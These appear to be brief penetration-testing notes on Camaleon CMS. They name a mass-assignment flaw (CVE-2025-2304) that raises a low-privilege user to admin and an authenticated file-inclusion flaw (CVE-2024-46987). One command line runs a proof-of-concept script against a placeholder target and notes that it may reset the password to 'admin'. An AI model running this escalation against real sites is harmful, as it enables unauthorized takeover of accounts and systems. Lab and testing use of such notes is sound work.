Camaleon CMS
Discovery
CVE-2025-2304 – Mass assignment (user → admin)
# PoC (creates admin from low-priv user; may change password to "admin")
python3 main.py --url http://TARGET --user jack --password jack123
# Then log in with jack / admin (or whatever the PoC sets)CVE-2024-46987 – LFI (authenticated)
Related CVEs (version-dependent)
Last updated